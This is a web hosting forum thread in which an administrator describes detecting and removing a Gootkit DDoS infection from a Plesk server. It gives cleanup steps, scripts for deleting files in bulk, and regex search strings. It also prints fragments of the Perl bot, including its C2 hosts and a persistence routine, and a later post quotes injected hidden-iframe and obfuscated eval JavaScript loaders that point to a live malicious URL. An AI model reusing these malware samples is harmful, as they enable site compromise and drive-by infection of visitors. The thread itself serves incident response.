Announcement

Collapse
No announcement yet.

DNS Flodding attack SERVER 2008 r2 high outgoing bandwidth usage

Collapse
This is a sticky topic.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • DNS Flodding attack SERVER 2008 r2 high outgoing bandwidth usage

    Hi guys,
    we're victim of flooding attack in last weeks and all tech are working on the issue in order to solve it.
    We checked all the system with KAS, Microsoft Essential,Malware bytes now with Sophos and as last one we will also checking with Bitdefender in order to be sure that no virus or malware has infected our server
    However we googled and we have found this interesting article about this type of attack which seems affect several windows server in last few months , Problem with DNS.exe high outgoing bandwidth usage where there's an interesting suggestion to check also perl scripts which could be cause of this type of server issue.

    We're now checking perl files in server in order to be sure that is not it the issue.

    Are anyone still annoyed from similar issue.....has anyone find a different solution ?


    Giorgio

  • #2
    Hi Guys,
    i think that i found a possibile solution.
    As per previous ticket i checked perl script and in effect i found more duplicate files with same function where one as a really pretty good name "demonize".
    Seems attack was done with "Gootkit" in my particular case seems depend from fact that some one has hacked plesk get ftp user and password and played with my server.
    So what we need to in order to make order and secure server:

    1. close ftp port in order to prevent any upload
    2. download textcrawler or any other text search tools which includes regex
    3. stop all services in order to prevent massive usage of bandwith and resources on server
    4. when server is null-routed scan all server with different antivirus i personally suggest KAS, Sophos,Bitdefender,Malwarebytes,Microsoft Essential in order to check for virus or malware infection
    5. check for plesk patch if is needed and apply to plesk panel
    6. scan your harddrive , all hard drive to find all file with extension .pl (perl) and u can use this little
    here below a little portion of the script which can help you to identify this evil:
    Code:
    #part of the Gootkit ddos system
    use Fcntl qw(:flock :DEFAULT);	
    
    use Socket;
    use IO::Socket;
    use IO::Select;
    
    use POSIX 'setsid';
    use Cwd 'abs_path';
    
    print "Content-type: text/plain\n\n";
    
    #---------------------------------------------------#
    #	CUSTOM parameters								#
    #---------------------------------------------------#
    my $number_of_bots = 5;
    my @defaults = ("callebook.com:80", "cellularebook.com:80", "whitewithstand.com:80");
    my $pingTimeout = 1200;
    my $proxyPort = 5432;
    #---------------------------------------------------#
    
    
    my $lockfilename;
    my $serverfile;
    my $idfile;
    my $uafile;
    
    my $kernel;
    my $version = "2";
    my $localip; 
    my $botid;
    my $ua;
    
    my $script_path = abs_path($0);
    
    if ($^O eq "MSWin32"){
    	my $temp = `echo %temp%`;
    	chomp $temp;
    	$lockfilename = $temp."\\~PIF3E6.tmp";
    	$serverfile = $temp."\\~PIFSRV6.tmp";
    	$idfile = $temp."\\~PIFID45.tmp";
    	$uafile = $temp."\\~PIFUA11.tmp";
    }
    else {
    	$lockfilename = "/tmp/apachectrl.lock";
    	$serverfile = "/tmp/apachectrl.log";
    	$idfile = "/tmp/id";
    	$uafile = "/tmp/ua";
    }
    or

    Code:
    #------------------------------------------------------------------#
    sub demonize {
    		
    	if ($^O eq "MSWin32")
    	{
    		my $schedDelete = "schtasks /delete /f /tn perl";
    		my $schedCreate = "schtasks /create /tr \"".$^X." ".abs_path($0)." detach\" /tn perl /sc MINUTE /mo 1";
    		print $schedDelete."\n";
    		print  $schedCreate."\n";
    		`$schedDelete`;
    		`$schedCreate`;
    		
    		
    		my $child_proc;
    		print "detach...\n";
    		require Win32::Process;
    		Win32::Process::Create($child_proc, "$^X", "perl.exe ".abs_path($0)." normal", 0, DETACHED_PROCESS, ".") || die "Could not spawn child: $!";
    		$child_pid = $child_proc->GetProcessID();		
    		print "child_pid = $child_pid, pid = $$ \n";
    			
    		sleep(1.0);
    		POSIX::waitpid(-1, POSIX::WNOHANG()); # clean up any defunct child process
    		print "exit pid=$$\n";
    		exit;
    	}
    	else {
    		$SIG{CHLD} = \&REAPER;
    		if ( fork() ) {
    			exit;
    		}		 
    		setsid();
    when you find all this file proceed to delete them.TAKE CARE:EACH FILE CHANGE ITS NAME no one will be the same of previous one.This search may show you some other file which is needed from system if you enabled Perl......take care to delete only required file.

    7. Check all your cronjob, seems that script place also a cronjob in server(not sure again about it)
    8. Change all plesk administrator and customer password i personally suggest really hot password and you may find an interesting online too for strong password generator.
    9. Change all FTP account and password.Personal suggest use as username String which reflect a password without any special character and a strong password as mentioned above.(you may use same tools to do it)
    10. When all is done reactivate services one by one and checking traffic with netstat or any other tool that you know in order to verify that all the situation is normalized and no high bandwith usage continues.

    Continue monitoring your server is most important thing in order to reduce and prevent any other attack.

    I'm not sure that all this stuff can absolutely solve all the issue but seems help us.

    I hope that you may find those info hopefull


    Giorgio

    Comment


    • #3
      How to delete lot of file in few line of code

      If some need helo here a simple version of simple vbnet script to delete all files in simple manner (you may also opt to PS script or anything you think could be more practice to you)

      This simple script assume that u have a simple form with a button a progress bar nothing else

      Code:
      Public Class Form1
      
          Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
              Dim o As New OpenFileDialog
              o.ShowDialog()
      
              If String.IsNullOrEmpty(o.FileName) Or String.IsNullOrWhiteSpace(o.FileName) Or IsNothing(o.FileName) Then
                  MsgBox("Choose a file to deleted")
              Else
                  DeleteFilesFromDrives(o.FileName)
              End If
          End Sub
          Private Sub DeleteFilesFromDrives(filepath As String)
              Dim Sr As New System.IO.StreamReader(filepath.ToString)
              Dim ListItems As New List(Of String)
      
              While Sr.Peek > 0
                  ListItems.Add(Sr.ReadLine)
              End While
              Sr.Close()
      
              With ProgressBar1
                  .Minimum = 0
                  .Maximum = ListItems.Count - 1
                  .Step = 1
                  .Show()
              End With
              Dim LogString As String = "[{0}]:{1} {2}"
              'Start To delete
              Dim Sb As New System.Text.StringBuilder
              For i As Integer = 0 To ListItems.Count - 1
                  Try
                      If System.IO.File.Exists(ListItems(i).ToString) Then
                          System.IO.File.Delete(ListItems(i).ToString)
      
                      End If
                      Sb.AppendLine(String.Format(LogString, Now.ToString, ListItems(i).ToString, "DELETED"))
                  Catch ex As Exception
                      Sb.AppendLine(String.Format(LogString, Now.ToString, ListItems(i).ToString, "FAILED"))
                  End Try
                  ProgressBar1.PerformStep()
              Next
              Dim Sw As New System.IO.StreamWriter("YOUR PATH WHERE SAVE YOUR DATA ABOUT DELETE TASK(WITH FILE NAME AT THE END)")
              Sw.Write(Sb.ToString)
              Sw.Close()
              Sb.Clear()
              Sb = Nothing
          End Sub
      End Class
      It work great for me

      Giorgio

      Comment


      • #4
        Using PS1 to remove unwanted files

        Here you may also find a simple PS1 script (Power Shell) that you can run.
        It is provided as it is without any warranty, if you're not sure about what are you doing asking to someone who can help you.

        Code:
        $Dir=""
        $File=""
        $FileName="YOUR_FILEPATH_AS_CSV.csv"
        $SavePath="YOUR_FILEPATH_WHERE_SAVE_LOG_OPERATION_AS_TXT.TXT"
        $FilesToDelete=import-csv $FileName
        $PT=""
        $stream = [System.IO.StreamWriter] $SavePath
        
        
        
        $FilesToDelete | ForEach-Object {    
           $PT = $_.FILETODELETE
           Write-Host $PT
        	Write-Host "Checking " +$PT
        $stream.WriteLine("Checking " + $PT)
           If (Test-Path $PT)
        	{
        		$stream.WriteLine("File exist....deleting")
        		Remove-Item $PT
        		$stream.WriteLine("File " + $PT + " successfully deleted")
        Write-Host "File " + $PT + " successfully deleted"
        	}else{$stream.WriteLine("File" + $PT + " not found.")}
         }
         $stream.close
        #$PT|Out-file $SavePath
        I hope it is helpfull to you


        Giorgio

        Comment


        • #5
          This post should be made sticky..! Great info Giorgio thats lot of useful searching..!

          Comment


          • #6
            Originally posted by JamesC View Post
            This post should be made sticky..! Great info Giorgio thats lot of useful searching..!
            Sticky done !

            Great post Giorgio ! Thanks for taking the efforts with posting a useful material for our fellow forum mates.

            Comment


            • #7
              How to perform massive Plesk Password Reset.

              Hi guys,
              many thanks to kind word about my effort however I have another little update about it.
              After we deleted all the files involved into the attack seems server is now working fine but in my particular case i have more than 300 ftp account to change and those tasks should require a lot of time to do it.
              In order to reduce work time i have checked with Spencer of Webhosting.uk.com and we have found this interesting post about use a plesk script to perform this action as bulk operation Massive Plesk Password Reset and when it will finished you will have a .csv stored wherever you want with all details of new password account.
              In this particular tool you will find a lot of options to chose how reset your password
              When you will run this script it will take care to change as per your requirement all passwords on admin account,domain ftp,additional ftp,customer ftp, etc etc etc.
              Yesterday we have performed it into our server and it has worked very fine however in order to be sure that all is fine, after that you have performed those tasks you must be sure to take care to check that all domain work as well and also that ftp work as well to with new password.

              I hope that will be very hopefull to all you.

              Regards
              Giorgio

              Comment


              • #8
                Hi guys,
                i forget one important thing!!!!
                When you're victim of this type attack you may pay attention to your file into domain coz you may also victim of script inject/code injection.
                In my case i have found more files which were corrupted with code injection tipically hidden iframe and or hidden script injection.
                In both case the script use a default schema in example

                HIDDEN IFRAME STANDARD
                Code:
                <--!--><IFRAM SRC="REDIRECTURL"/><--!-->

                HIDDEN SCRIPT STANDARD
                Code:
                <--!--><SCRIPT TYPE="JAVASCRIPT">JAVASCRIPT CODE</SCRIPT><--!-->
                In order to remove this malicious script you may :

                RE-UPLOAD YOUR CONTENT
                SEARCH WITH TEXTCRAWLER
                CREATE YOUR OWN SCRIPT WHICH REPLACE THIS PARTICULAR TEXT

                I hope that could help you and that you find it helpfull

                Giorgio

                Comment


                • #9
                  Originally posted by giorgio turri View Post

                  HIDDEN IFRAME STANDARD
                  Code:
                  <--!--><IFRAM SRC="REDIRECTURL"/><--!-->
                  HIDDEN SCRIPT STANDARD
                  Code:
                  <--!--><SCRIPT TYPE="JAVASCRIPT">JAVASCRIPT CODE</SCRIPT><--!-->
                  I wrote wrong tags excuse me here the right one :

                  Code:
                   <!-- . --><iframe width="1px" height="1px" src="http://papapkz.myvnc.com/openstat/appropriate/bound-side-load_odds.php" style="display: block;" ></iframe>

                  and here another one

                  Code:
                   <!-- . --><script>ps="sp"+"li"+"t";asd=function(){d.body++};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,145,62,170,163,154,62,155,162,152,163,63,163,164,151,162,167,170,145,170,63,145,164,164,166,163,164,166,155,145,170,151,63,146,163,171,162,150,61,167,155,150,151,61,160,163,145,150,143,163,150,150,167,62,164,154,164,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,145,62,170,163,154,62,155,162,152,163,63,163,164,151,162,167,170,145,170,63,145,164,164,166,163,164,166,155,145,170,151,63,146,163,171,162,150,61,167,155,150,151,61,160,163,145,150,143,163,150,150,167,62,164,154,164,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-6)+parseInt(a[i],8);}try{asd()}catch(q){zz=5-5;}try{zz/=2}catch(q){zz=1;}if(!zz)eval(ss["fromCharCode"].apply(ss,a));</script>
                  <!-- . -->
                  Take care that this is one of the urls that them use.....and this is the tags that you use to search with regex in your file :
                  Code:
                  <!-- . -->
                  Google webmaster tools sent me an alert which says that has recognized this malware on site from this little string
                  Code:
                  if(!zz)eval(ss["fromCharCode"].apply(ss,a));
                  .
                  This could be a start point to check your file as per google's suggestion

                  Bye
                  Giorgio

                  PS my server now is clean and we're not facing any other issues ....thanks guys
                  Last edited by giorgio turri; 28-06-13, 10:43 PM.

                  Comment

                  Working...
                  X